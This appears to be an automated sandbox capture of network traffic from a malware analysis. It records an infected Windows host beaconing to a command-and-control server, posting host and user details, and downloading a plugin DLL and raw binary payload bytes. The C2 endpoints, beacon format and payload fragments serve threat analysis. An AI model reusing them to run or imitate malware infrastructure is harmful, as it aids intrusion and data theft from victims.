                                                                                                                                          Apr 28, 2021 23:00:42.673801899 CEST13376OUTData Raw: a7 09 3d 0d fd 36 5e 80 57 f2 c3 ff 00 05 0e 55 5f db fb e3 9a a2 80 07 c6 1f 13 00 00 e0 0f ed 5b 9a fe a5 74 a9 72 06 6b f9 6a ff 00 82 87 73 fb 7f 7c 72 3f f5 58 7c 4d ff 00 a7 5b 9a fd bb e8 f1 2b e6 f8 df fa f7 1f fd 28 fc f3 c4 c5 6c 1d 0f
                                                                                                                                          Data Ascii: =6^WU_[trkjs|r?X|M[+(l?ruIz?HD-v3q_i_5]_H,0UEI$x<FT{ygnp=OUj"'RXiPrcmxH
                                                                                                                                          Apr 28, 2021 23:00:42.673830986 CEST13391OUTData Raw: 79 ba 8e 9d f6 8b 07 1a 65 e4 af 14 72 cd 73 69 e4 cb 34 d1 ac d2 3b ca a1 c7 89 53 28 cd a3 89 93 8b bc 1b 8e 97 b2 69 41 46 4a da d9 39 59 a5 aa 4a 9c 55 9f 3c cf 55 e6 99 5d 6a 7a ab 4a da 3b 5d a7 dd da d7 7b dd de 2d b9 c9 de f1 82 5e 9b f1
                                                                                                                                          Data Ascii: yersi4;S(iAFJ9YJU<U]jzJ;]{-^?O.x^$Q|E<>.$APq*nBv'Bo<#mS6>tGeso,A\mim=[="o05[O[
                                                                                                                                          Apr 28, 2021 23:00:42.673858881 CEST13399OUTData Raw: cf f6 5a f1 27 c5 0f 0e 78 47 43 26 d2 ca 49 2c f5 3b 28 55 42 cc bd 36 ff 00 c0 ab dc c3 78 93 52 a6 26 95 0c cf 01 28 39 c9 47 9b a6 a6 33 e0 ca b8 5a 15 71 39 7e 65 0a b1 a5 17 2e 5f b5 64 7f 29 5f f2 d2 bf 4a 7f e0 d5 eb 2d 33 52 ff 00 82 97
                                                                                                                                          Data Ascii: Z'xGC&I,;(UB6xR&(9G3Zq9~e._d)_J-3Rj:+u]X$0#3_wWF{~++[7/xa2nBy9$JU+e!vY}HRSg>y[wi/f=G;-!2,L$+'~k
                                                                                                                                          Apr 28, 2021 23:00:42.673976898 CEST13412OUTData Raw: ab ed 29 2b 28 a4 97 36 26 19 3c 30 b3 9b 51 73 e5 6e 3c b7 b7 37 33 8d ad 65 bc 25 cc 9f 78 47 5e 67 2b f3 55 eb 5e 1c f0 6f ec ef f0 bb e0 1e 8b f1 e3 f6 92 f0 ff 00 8e bc 4b 37 8d 7c 45 a8 e9 5e 0c f0 af 81 b5 fb 5d 18 ac 3a 72 5b b5 ed f5 d5
                                                                                                                                          Data Ascii: )+(6&<0Qsn<73e%xG^g+U^oK7|E^]:r[8b3KI<:{ KmGxB<CyOSo5}.("iQkn[@$I"}lkW<a/{h\~ :T<=}#I:
                                                                                                                                          Apr 28, 2021 23:00:42.770381927 CEST13415OUTData Raw: c5 7d 8b f1 a3 c0 9e 16 bc f8 c5 e2 cb bb 8f 8d 1e 19 b5 92 5f 13 5f bb da cf 6b aa 19 21 26 e1 c9 46 29 64 ca 58 74 3b 58 8c 8e 09 1c d7 c6 5f f0 75 15 bc 76 7f 08 7f 64 9b 4b 5b f8 ae 92 2f 0c 78 81 12 ea 00 e2 39 94 5b e8 20 3a 87 55 60 a7 a8
                                                                                                                                          Data Ascii: }__k!&F)dXt;X_uvdK[/x9[ :U`&}']Oc7z1')+x-oF]jDG7~(#$#3M9?Fw|?9'M
                                                                                                                                          Apr 28, 2021 23:00:42.770467997 CEST13431OUTData Raw: f6 ca bf 2d ff 00 e0 ba 5f b5 b7 ec ff 00 fb 65 7e d6 de 1c f8 9b fb 37 f8 f0 f8 8b 42 d3 fe 1c 59 e9 57 57 e7 4a ba b3 db 76 97 f7 f3 34 7b 2e a2 8d ce 12 78 8e e0 bb 4e ec 03 90 71 f1 55 29 fb a2 bf 42 e1 1f 08 38 6b 82 f3 85 99 60 ab 56 94 d4
                                                                                                                                          Data Ascii: -_e~7BYWWJv4{.xNqU)B8k`V\m9AH|lAE$5W_!jX&l19#9hSU/;Vap2~?>*m|@4-7U}.lHI!v|O1_l


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
583 | 192.168.2.4 | 50100 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:42.555711985 CEST | 13333 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
584 | 176.111.174.114 | 80 | 192.168.2.4 | 50100 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:42.655143023 CEST | 13360 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:42 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
585 | 192.168.2.4 | 50101 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:42.875133991 CEST | 13546 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
586 | 176.111.174.114 | 80 | 192.168.2.4 | 50099 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:42.966715097 CEST | 13546 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:42 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
587 | 176.111.174.114 | 80 | 192.168.2.4 | 50101 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:42.984954119 CEST | 13547 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:42 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
588 | 192.168.2.4 | 50103 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:43.193471909 CEST | 13547 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
589 | 176.111.174.114 | 80 | 192.168.2.4 | 50103 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:43.291110039 CEST | 13548 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:43 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
59 | 176.111.174.114 | 80 | 192.168.2.4 | 49777 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:19.923118114 CEST | 4550 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 20:59:19 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 176.111.174.114 | 80 | 192.168.2.4 | 49750 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:10.319871902 CEST | 4389 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 20:59:10 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
60 | 192.168.2.4 | 49778 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:20.123038054 CEST | 4551 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          61 | 176.111.174.114 | 80 | 192.168.2.4 | 49778 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:20.219944954 CEST | 4552 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          62 | 192.168.2.4 | 49779 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:20.421418905 CEST | 4552 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          63 | 176.111.174.114 | 80 | 192.168.2.4 | 49779 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:20.522376060 CEST | 4553 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          64 | 192.168.2.4 | 49780 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:20.741419077 CEST | 4553 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          65 | 176.111.174.114 | 80 | 192.168.2.4 | 49780 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:20.848975897 CEST | 4554 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          66 | 192.168.2.4 | 49781 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:21.066978931 CEST | 4554 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          67 | 192.168.2.4 | 49782 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:21.123275995 CEST | 4555 | OUT | GET /Hnq8vS/plugins/scr.dll HTTP/1.1
                                                                                                                                          Host: 176.111.174.114


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          68 | 176.111.174.114 | 80 | 192.168.2.4 | 49781 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:21.171308994 CEST | 4555 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          69 | 176.111.174.114 | 80 | 192.168.2.4 | 49782 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:21.218883991 CEST | 4556 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          Last-Modified: Fri, 23 Apr 2021 10:22:18 GMT
                                                                                                                                          ETag: "37800-5c0a12ba42a80"
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 227328
                                                                                                                                          Content-Type: application/octet-stream


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          7 | 176.111.174.114 | 80 | 192.168.2.4 | 49751 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:10.357990026 CEST | 4391 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:10 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          Last-Modified: Fri, 23 Apr 2021 10:22:14 GMT
                                                                                                                                          ETag: "1f200-5c0a12b672180"
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 127488
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Apr 28, 2021 22:59:10.358041048 CEST4393INData Raw: 89 48 0c 8d 54 24 04 8b 06 e8 4d fe ff ff 84 c0 75 04 33 c0 eb 18 b0 01 eb 14 8b 06 8b 00 89 06 8b 06 3b 44 24 0c 0f 85 59 ff ff ff 33 c0 83 c4 10 5d 5f 5e 5b c3 90 53 56 57 8b da 8b f0 81 fe 00 00 10 00 7d 07 be 00 00 10 00 eb 0c 81 c6 ff ff 00
                                                                                                                                          Data Ascii: HT$Mu3;D$Y3]_^[SVW}sjh Vj4;t#AuhjP3_^[SVWUCjh hU;usjh VU;t#Ae
                                                                                                                                          Apr 28, 2021 22:59:10.358064890 CEST4395INData Raw: 83 c4 18 5d 5f 5e 5b c3 90 53 83 c4 e8 8b d9 8d 88 ff 3f 00 00 81 e1 00 c0 ff ff 89 0c 24 03 d0 81 e2 00 c0 ff ff 89 54 24 04 8b 44 24 04 3b 04 24 76 5f 8b cb 8b 54 24 04 2b 14 24 8b 04 24 e8 1d fd ff ff 8d 4c 24 08 8b d3 b8 f4 d5 41 00 e8 5d f9
                                                                                                                                          Data Ascii: ]_^[S?$T$D$;$v_T$+$$L$A]\$tL$T$nD$D$D$D$|$tT$A3[UQ3Uh@d2d"hA=EAthAACA9 A/hj_
                                                                                                                                          Apr 28, 2021 22:59:10.358088017 CEST4396INData Raw: f4 ff ff b3 01 8b c3 83 c4 0c 5d 5f 5e 5b c3 53 56 83 c4 f4 8b da 8b f0 89 34 24 8b 04 24 89 58 08 8b 04 24 03 c3 83 e8 0c 89 58 08 81 fb 00 10 00 00 7f 76 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 15 1c d6 41 00 8b 54 82 f4 89 54 24 04 83 7c 24 04
                                                                                                                                          Data Ascii: ]_^[SV4$$X$XvyATT$|$u#A$L$$P$$D$D$$T$P$T$D$$D$$PV<|uAAD$$AD$D$$T$P$T$D$
                                                                                                                                          Apr 28, 2021 22:59:10.358109951 CEST4397INData Raw: 33 c0 5a 59 59 64 89 10 68 23 25 40 00 80 3d 45 d0 41 00 00 74 0a 68 c4 d5 41 00 e8 f1 ed ff ff c3 e9 27 19 00 00 eb e5 8b 45 fc 5b 8b e5 5d c3 90 55 8b ec 83 c4 f0 53 8b d8 33 c0 a3 c0 d5 41 00 80 3d bc d5 41 00 00 75 1f e8 da f5 ff ff 84 c0 75
                                                                                                                                          Data Ascii: 3ZYYdh#%@=EAthA'E[]US3A=AuuAE3Uh&@d2d"=EAthA]EEEuA A%)AtSE@|tAU+
                                                                                                                                          Apr 28, 2021 22:59:10.358134031 CEST4399INData Raw: 41 00 59 09 c0 74 19 89 01 c3 b0 02 e9 86 00 00 00 89 10 89 c8 ff 15 40 b0 41 00 09 c0 75 eb c3 b0 01 e9 70 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c b0 41 00 59 09 c0 74 e7 89 01 c3 8d 40 00 89 15 04 b0 41 00 e8 39 1a 00 00 c3 53 56 8b f2 8b d8 80
                                                                                                                                          Data Ascii: AYt@AuptP<AYt@A9SV=AtAu7w3HA3^[$PRQ|7YZXu1@S\7[VW|$1t+~9
                                                                                                                                          Apr 28, 2021 22:59:10.358158112 CEST4400INData Raw: 00 8d 45 fc 50 8b 43 08 f7 ee 50 57 8b 03 50 ff 55 0c 85 c0 75 11 e8 6e e2 ff ff e8 69 fb ff ff 33 c0 89 45 fc eb 3f 8b 45 fc 33 d2 f7 73 08 89 45 fc 8b 45 14 85 c0 74 0a 8b 45 14 8b 55 fc 89 10 eb 23 3b 75 fc 74 1e 8b 45 08 e8 39 fb ff ff 33 c0
                                                                                                                                          Data Ascii: EPCPWPUuni3E?E3sEEtEU#;utE93Eg(3EE_^[Y]US]ShhL/@jd[[]SV3fCf=r/f=w)f%f=uSuS$tHAtg^[fxuP
                                                                                                                                          Apr 28, 2021 22:59:10.358181000 CEST4402INData Raw: 01 d8 8a 1e 46 84 db 75 d5 fe cd 75 02 f7 d8 59 31 f6 89 32 5f 5e 5b c3 8d 40 00 56 57 89 c6 89 d7 81 e1 ff 00 00 00 f3 a6 5f 5e c3 8d 40 00 e9 03 00 00 00 c3 8b c0 53 31 db 85 c0 7c 4d 0f 84 9a 00 00 00 3d 00 14 00 00 0f 8d 81 00 00 00 89 c2 83
                                                                                                                                          Data Ascii: FuuY12_^[@VW_^@S1|M=S5@tytS6@taC_7@S=}FS5@t4tS6@tC_7@5@[
                                                                                                                                          Apr 28, 2021 22:59:10.358206034 CEST4403INData Raw: c3 87 d1 81 f9 00 00 00 ff 73 11 81 f9 00 00 00 fe 72 07 0f bf c9 03 08 ff 21 ff e1 81 e1 ff ff ff 00 01 c1 89 d0 8b 11 e9 94 20 00 00 c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b d9 8b fa 8b f0 33 c0 55 68 a2 3a 40 00 64 ff 30 64 89
                                                                                                                                          Data Ascii: sr! @USVW3]3Uh:@d0d 3qE}t8E@tt$PPMEPjU ;3ZYYdh:@E_^[YY]SVCt)2;0ur;pur;
                                                                                                                                          Apr 28, 2021 22:59:10.466197014 CEST4405INData Raw: c0 59 64 89 08 58 5d e8 b7 fd ff ff ff e2 c3 31 d2 8b 4c 24 08 8b 44 24 04 83 c1 05 64 89 02 ff d1 c2 0c 00 c3 8b c0 55 8b ec 8b 55 08 8b 02 3d 92 00 00 c0 7f 2c 74 5c 3d 8e 00 00 c0 7f 15 74 57 2d 05 00 00 c0 74 5c 2d 87 00 00 00 74 3d 48 74 4e
                                                                                                                                          Data Ascii: YdX]1L$D$dUU=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&"%R]D$@=$AwD$PtqD$


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
70 | 192.168.2.4 | 49783 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:21.378844976 CEST | 4597 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
71 | 176.111.174.114 | 80 | 192.168.2.4 | 49783 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:21.483453989 CEST | 4653 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
72 | 192.168.2.4 | 49784 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:21.704829931 CEST | 4794 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
73 | 176.111.174.114 | 80 | 192.168.2.4 | 49784 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:21.816256046 CEST | 4795 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
